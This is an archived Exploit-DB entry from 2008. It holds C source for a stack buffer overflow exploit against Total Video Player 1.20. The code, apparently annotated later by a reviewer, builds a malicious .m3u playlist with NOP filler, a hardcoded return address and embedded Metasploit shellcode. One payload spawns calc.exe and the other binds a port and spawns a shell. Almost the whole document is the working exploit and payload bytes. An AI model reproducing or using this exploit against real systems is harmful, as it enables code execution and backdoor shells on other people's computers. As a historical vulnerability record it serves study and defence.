Total Video Player 1.20 - '.m3u' File Local Stack Buffer Overflow

EDB-ID:

5077


Author:

fl0 fl0w

Type:

local


Platform:

Windows

Date:

2008-02-07


/*0day Total Video Player V1.20 .M3u File Local Stack Buffer Overflow
This exploit spawns Calc.exe or binds a port and spawns a shell; it was tested on Windows XP SP2.
I got the idea to look at a prior version of TVP and,
to my surprise, it is vulnerable too, just like V1.30.
When parsing a crafted .m3u file the stack gets corrupted due to a
long string, causing a stack overflow. We get control of the EBP and
EIP registers. The ESP register points exactly after the return-address position.
[corrupted stack] [EIP->points here][ESP->points here]
So do a jmp back and a JMP ESP, and it points to the specific part of
the stack that I want. Credits for finding this bug && sploit go to fl0 fl0w.
Vendor not informed yet.
Special THANKS to Expanders !!!!
*/ 
#include<stdio.h>
#include <stdlib.h>
#include <string.h>
#include<windows.h>

/* Playlist prefix and suffix that wrap the overlong path entry written by
 * main(). FIRST is an extended-M3U header plus the start of a Windows path
 * ("D:\"); LAST closes the entry. Everything between them is the long string
 * the header comment says the parser copies onto its stack. */
#define FIRST "#EXTM3U\r\n#EXTINF:3:50,-Ombladon - Noapte Buna Bucuresti Feat. Guesswho\r\nD:\\"
#define LAST ".mp3\r\n"
/* Byte index within the generated entry at which main() places retaddress.
 * NOTE(review): from a defensive angle, the observable artefact of this
 * crafted file is a playlist path several hundred bytes long; a parser that
 * bounds the path length before copying would not reach this offset. */
#define OFFSET 545

#define EVILFILE "evil.m3u"  /* written to the current working directory */

// shellcode from metasploit (author's note). Two payloads, selected by the
// menu printed in Notes(): scz1 for option 1 ("Spawn Calc.exe"), scz2 for
// option 2 ("Bind port&&spanw a shell"). main() copies each with strlen()
// and emits the entry through "%s", so a 0x00 byte anywhere inside either
// array would silently truncate what is written.
char scz1[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";
// payload for menu option 2 (see Notes())
char scz2[]="\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";

// x86 near jump (opcode E9, rel32 0xFFFFFDDE = -546). Declared but never
// referenced by main(); presumably a leftover of the "jmp back" step the
// header comment describes.
char jmpback[] = "\xE9\xDE\xFD\xFF\xFF"; 
// NOTE(review): an empty parameter list in C means "unspecified arguments";
// the prototype form is `void Notes(void);`.
void Notes();

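    /*
 * Builds the overlong playlist entry for payload `sc` and writes the whole
 * playlist (FIRST, entry, LAST) to `p`. Entry layout, unchanged from the
 * original:
 *   [0, OFFSET)               0x90 filler
 *   [OFFSET, OFFSET+4)        retaddress, copied as 4 raw bytes in host order
 *                             (the original assumes a 32-bit unsigned int)
 *   [OFFSET+4, OFFSET+16)     12 more 0x90 bytes
 *   [OFFSET+16, +strlen(sc))  the payload, then one terminating NUL
 * The entry is emitted with "%s", so it ends at the first NUL byte; that is
 * why the payload length is taken with strlen().
 *
 * Returns 0 on success, -1 if the buffer cannot be allocated. Does not close p.
 */
static int write_payload(FILE *p, const char *sc, unsigned int retaddress)
{
    size_t sclen = strlen(sc);
    /* The original sized this as OFFSET + 5 + len + 12: the "+5" is the four
     * address bytes plus the NUL, the "+12" the second run of filler. */
    size_t total = OFFSET + 5 + sclen + 12;
    unsigned char *buffer = malloc(total);
    if (buffer == NULL) {
        return -1;
    }

    memset(buffer, 0x90, total);
    size_t offset = OFFSET;
    memcpy(buffer + offset, &retaddress, 4);
    offset += 4 + 12;
    memcpy(buffer + offset, sc, sclen);
    offset += sclen;
    buffer[offset] = '\0';   /* index total - 1: the last byte allocated */

    fprintf(p, "%s%s%s", FIRST, buffer, LAST);
    free(buffer);
    return 0;
}

/*
 * Entry point. Prints the menu (Notes), reads one integer from stdin and,
 * for option 1 (scz1) or option 2 (scz2), writes EVILFILE containing the
 * crafted playlist. Any other input writes nothing.
 *
 * Fixes relative to the original: `buffer` was freed without ever being
 * assigned when the input was not 1 or 2 (undefined behaviour), EVILFILE was
 * opened before the choice was read and left open and empty on that path,
 * the malloc result and the scanf/fclose return values were never checked,
 * and the "error" path exited with status 0.
 *
 * Returns 0 on success (or when nothing was selected), EXIT_FAILURE when
 * EVILFILE cannot be opened or written.
 */
int main(void)
{
    unsigned int retaddress = 0x015EE557;   /* hardcoded jump target, from the original */
    int input = 0;
    const char *sc = NULL;

    Notes();
    /* A failed read leaves input at 0, which selects nothing, as before. */
    if (scanf("%d", &input) != 1) {
        input = 0;
    }
    switch (input) {
    case 1:
        sc = scz1;
        break;
    case 2:
        sc = scz2;
        break;
    default:
        break;   /* unknown option: nothing to write */
    }
    if (sc == NULL) {
        return 0;
    }

    FILE *p = fopen(EVILFILE, "wb");
    if (p == NULL) {
        printf("error\n");
        return EXIT_FAILURE;
    }
    int rc = write_payload(p, sc, retaddress);
    /* fclose flushes the data; report a failed flush like any other error. */
    if (fclose(p) != 0 || rc != 0) {
        printf("error\n");
        return EXIT_FAILURE;
    }
    return 0;
}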
  
/* Prints the banner and the two-option menu whose answer main() reads from
 * stdin. The output bytes are exactly those of the original (including the
 * "spanw" typo, which is a user-visible string and therefore preserved). */
void Notes()
{
    static const char *const banner[] = {
        "^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n",
        "Total Video Player V1.20 .M3u File Local Stack Buffer Overflow\n",
        "Credits for finding this bug&&sploit go to fl0 fl0w\n",
        "SPECIAL THANKS TO EXPANDERS\n\n",
        "{1}Spawn Calc.exe\n",
        "{2}Bind port&&spanw a shell\n\n",
        "^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n",
    };
    for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++) {
        fputs(banner[i], stdout);
    }
}

// milw0rm.com [2008-02-07]